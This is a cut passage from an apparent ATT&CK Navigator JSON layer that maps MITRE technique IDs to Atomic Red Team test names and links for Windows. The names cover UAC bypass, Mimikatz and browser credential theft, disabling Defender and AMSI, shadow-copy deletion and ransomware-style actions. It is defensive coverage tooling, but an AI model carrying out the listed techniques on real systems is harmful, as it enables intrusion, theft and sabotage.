Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":14,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n- Running DLL with .init extension and function\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":3,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n- Data Encrypt Using DiskCryptor\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage Volume\n- Modify VSS Service Permissions\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n- Modify Service to Run Arbitrary Binary (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n- Atbroker.exe (AT) Executes Arbitrary Command via Registry Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n- Disable UAC notification via registry keys\n- Disable ConsentPromptBehaviorAdmin via registry keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":14,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n- Dump Chrome Login Data with esentutl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":5,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n- ESXi - Remove Syslog remote IP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":58,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":10,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - 